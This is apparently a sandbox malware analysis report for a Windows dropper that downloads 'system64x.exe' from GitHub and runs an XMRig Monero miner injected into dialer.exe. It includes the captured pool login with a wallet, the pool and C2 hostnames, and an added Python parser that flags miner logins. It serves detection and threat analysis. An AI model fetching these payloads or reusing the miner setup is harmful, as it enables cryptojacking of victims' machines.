Source: Yara match; File source: 0000002F.00000002.3603906840.0000025545E42000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000002F.00000002.3608696506.00000255463E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000002F.00000003.2470568560.0000025545E4D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000002F.00000002.3605197071.0000025545E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000002F.00000003.3053963293.0000025545E50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: dialer.exe PID: 7780, type: MEMORYSTR
Source: global traffic; TCP traffic: 192.168.2.5:49734 -> 149.102.143.109:10128 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"4axnhsyv9a9emwehmn6igq1erjgjfgyebcsx3azg7afhqu9cmgfqf77crfpnfhpun6hcvkws4ntoyrxkfsbkfh8p7e5xslu","pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"","algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2","cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa","argon2/chukwav2","argon2/ninja","ghostrider"]}}
Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: stratum+tcp://
Source: dialer.exe; String found in binary or memory: cryptonight-monerov7
Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: -o, --url=URL URL of mining server
Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp; String found in binary or memory: Usage: xmrig [OPTIONS]
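The TCP payload above is the Stratum JSON-RPC "login" request the injected dialer.exe sent to the pool on port 10128: the login field is the pool account (here a Monero address), the agent field names the miner build, and the algo array lists every hash function that build can run, which is why the same binary can be pointed at any pool the operator chooses. The following is an added example written for this page, not XMRig or Joe Sandbox code, that parses that captured payload, pulls out those fields and tags the reasons it reads as a miner login. The payload is copied from the report; since the sandbox rendered it in lower case, the address check is a shape check (length and leading digit) rather than a case-sensitive base58 validation.

```python
"""Added example for this page (not XMRig or Joe Sandbox code): parse a Stratum login and tag it."""
import json
import re
from typing import Dict, List, Optional

# Payload copied from the report's TCP traffic line (sandbox rendered it in lower case).
SAMPLE_PAYLOAD = (
    b'{"id":1,"jsonrpc":"2.0","method":"login","params":{'
    b'"login":"4axnhsyv9a9emwehmn6igq1erjgjfgyebcsx3azg7afhqu9cmgfqf77crfpnfhpun6hcvkws4ntoyrxkfsbkfh8p7e5xslu",'
    b'"pass":"","agent":"xmrig/6.19.3 (windows nt 10.0; win64; x64) libuv/1.38.0 msvc/2022","rigid":"",'
    b'"algo":["rx/0","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double",'
    b'"cn/ccx","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/upx2",'
    b'"cn/gpu","cn/1","rx/wow","rx/arq","rx/graft","rx/sfx","rx/keva","panthera","argon2/chukwa",'
    b'"argon2/chukwav2","argon2/ninja","ghostrider"]}}'
)

MONERO_ADDR_LENGTHS = {95, 106}     # standard / sub-address, integrated address


def parse_stratum_login(payload: bytes) -> Optional[Dict]:
    """Fields of a Stratum 'login' request, or None for anything else (jobs, keepalives, junk)."""
    try:
        msg = json.loads(payload.decode("utf-8", "replace").rstrip("\r\n. "))
    except ValueError:
        return None
    if not isinstance(msg, dict) or msg.get("jsonrpc") != "2.0" or msg.get("method") != "login":
        return None
    params = msg.get("params") or {}
    agent = str(params.get("agent", ""))
    m = re.match(r"([A-Za-z0-9_-]+)/(\d+(?:\.\d+)*)", agent)    # e.g. xmrig/6.19.3 (...)
    return {
        "wallet": str(params.get("login", "")),
        "agent": agent,
        "miner": m.group(1).lower() if m else None,
        "version": m.group(2) if m else None,
        "algos": [str(a) for a in params.get("algo", [])],
    }


def looks_like_monero_address(addr: str) -> bool:
    """Shape check only: 95 or 106 chars, starting with 4 (standard/integrated) or 8 (sub-address)."""
    return len(addr) in MONERO_ADDR_LENGTHS and addr[:1] in "48"


def indicators(info: Dict) -> List[str]:
    """Short tags saying why a parsed login reads as a cryptominer login."""
    tags = []
    if info["miner"] == "xmrig":
        tags.append("agent_xmrig")
    if looks_like_monero_address(info["wallet"]):
        tags.append("monero_wallet_shape")
    if any(a.startswith("rx/") for a in info["algos"]):
        tags.append("randomx_capable")
    if any(a.startswith(("cn/", "cn-")) for a in info["algos"]):
        tags.append("cryptonight_capable")
    return tags


if __name__ == "__main__":
    parsed = parse_stratum_login(SAMPLE_PAYLOAD)
    print(parsed["miner"], parsed["version"], parsed["wallet"], indicators(parsed))
```

The wallet address is the durable indicator here: pool hosts and ports change between campaigns (this one uses a non-standard port, which is what the "TCP or UDP traffic on non-standard ports" signature keys on), but the operator has to keep the same address to be paid.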
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown; HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49727 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: +@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct42C5.tmp.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B87641000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B87641000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ~1.PDB @ source: svchost.exe, 00000036.00000000.2489829053.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595101701.0000024B8764A000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000036.00000000.2489752703.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3594746319.0000024B8762B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wct4B1.tmpp.pdb source: svchost.exe, 00000036.00000000.2489909751.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000036.00000002.3595767574.0000024B8765A000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Windows\System32\winlogon.exe Code function: 22_2_000001E85898DCE0 FindFirstFileExW, 22_2_000001E85898DCE0
Source: C:\Windows\System32\lsass.exe Code function: 31_2_00000140AE86DCE0 FindFirstFileExW, 31_2_00000140AE86DCE0
Source: C:\Windows\System32\svchost.exe Code function: 32_2_00000195DD5CDCE0 FindFirstFileExW, 32_2_00000195DD5CDCE0
Source: C:\Windows\System32\dwm.exe Code function: 33_2_000001160CA9DCE0 FindFirstFileExW, 33_2_000001160CA9DCE0
Source: C:\Windows\System32\svchost.exe Code function: 48_2_00000257E10ADCE0 FindFirstFileExW, 48_2_00000257E10ADCE0
Source: C:\Windows\System32\svchost.exe Code function: 49_2_000001F28C93DCE0 FindFirstFileExW, 49_2_000001F28C93DCE0
Source: C:\Windows\System32\svchost.exe Code function: 50_2_000001CA9854DCE0 FindFirstFileExW, 50_2_000001CA9854DCE0
Source: C:\Windows\System32\svchost.exe Code function: 51_2_000001D26531DCE0 FindFirstFileExW, 51_2_000001D26531DCE0
Source: C:\Windows\System32\svchost.exe Code function: 52_2_00000254A27DDCE0 FindFirstFileExW, 52_2_00000254A27DDCE0
Source: C:\Windows\System32\wbem\WMIADAP.exe Code function: 53_2_0000028708E6DCE0 FindFirstFileExW, 53_2_0000028708E6DCE0
Source: C:\Windows\System32\svchost.exe Code function: 54_2_0000024B87DDDCE0 FindFirstFileExW, 54_2_0000024B87DDDCE0
Source: C:\Windows\System32\svchost.exe Code function: 55_2_00000205FD40DCE0 FindFirstFileExW, 55_2_00000205FD40DCE0
Source: C:\Windows\System32\svchost.exe Code function: 56_2_000001A2056ADCE0 FindFirstFileExW, 56_2_000001A2056ADCE0
Source: C:\Windows\System32\svchost.exe Code function: 57_2_0000018EC1F6DCE0 FindFirstFileExW, 57_2_0000018EC1F6DCE0
Source: C:\Windows\System32\svchost.exe Code function: 58_2_0000025CE3E0DCE0 FindFirstFileExW, 58_2_0000025CE3E0DCE0
Source: global traffic TCP traffic: 192.168.2.5:49734 -> 149.102.143.109:10128
Source: global traffic HTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/blob/main/system64x.exe?raw=true HTTP/1.1 | Host: github.com | Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/raw/main/system64x.exe HTTP/1.1 | Host: github.com
Source: global traffic HTTP traffic detected: GET /231d23EDD3dwedf234fdew223df23wqf/wef4t43gf34f4g4gfefwg4gfwfgehet5hsrtjrjefswf/main/system64x.exe HTTP/1.1 | Host: raw.githubusercontent.com | Connection: Keep-Alive
Source: Joe Sandbox View IP Address: 185.199.109.133
Source: Joe Sandbox View IP Address: 140.82.121.3
Source: Joe Sandbox View IP Address: 140.82.121.3
Source: Joe Sandbox View ASN Name: COGENT-174US
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic DNS traffic detected: DNS query: gulf.moneroocean.stream
Source: global traffic DNS traffic detected: DNS query: wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org
Source: unknown HTTP traffic detected: POST /api/endpoint.php HTTP/1.1 | Accept: */* | Connection: close | Content-Length: 487 | Content-Type: application/json | Host: wea9ufgh438790atrhjwiujngzhe4wa709rthjcwa9nv8n980avw.roast247.eu.org | User-Agent: cpp-httplib/0.12.6
Source: lsass.exe, 0000001F.00000000.2415950119.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3604819718.00000140AE074000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://3csp.icrosof4m/ocp0
Source: svchost.exe, 00000037.00000000.2501565455.00000205FD288000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415653790.00000140AE000000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3603749315.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415783526.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: lsass.exe, 0000001F.00000000.2417171754.00000140AE209000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3608108139.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416903296.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000003.2771064773.00000140AE1F3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3609472974.00000140AE209000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: updater.exe, 0000001C.00000003.2442351012.0000015366BF0000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415653790.00000140AE000000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3603749315.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415783526.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000001F.00000000.2417171754.00000140AE209000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3608108139.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416903296.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000003.2771064773.00000140AE1F3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3609472974.00000140AE209000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3603749315.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415783526.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000001F.00000002.3598384379.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000001F.00000002.3598384379.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415028963.00000140AD88B000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000001F.00000000.2414877589.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3597393060.00000140AD850000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.000000000346B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://github.com
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2417171754.00000140AE209000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3608108139.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416903296.00000140AE1F1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3603749315.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000003.2771064773.00000140AE1F3000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3609472974.00000140AE209000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415653790.00000140AE000000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2415783526.00000140AE05A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0I
Source: lsass.exe, 0000001F.00000002.3607523102.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2416748843.00000140AE19A000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://ocsp.msocsp.com0
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000034EB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://raw.githubusercontent.com
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000026B1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000001F.00000000.2414877589.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3597393060.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000001F.00000000.2414807552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/erties
Source: lsass.exe, 0000001F.00000002.3596981552.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2401131352.00000000028E4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000001F.00000002.3608108139.00000140AE1AB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com/CPS0
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2432150701.000000001C83A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.coA
Source: dialer.exe, 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp String found in binary or memory: https://172.94.1q
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: SecuriteInfo.com.Win32.Malware-gen.17013.17645.exe, 00000001.00000002.2412690299.000000001272F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
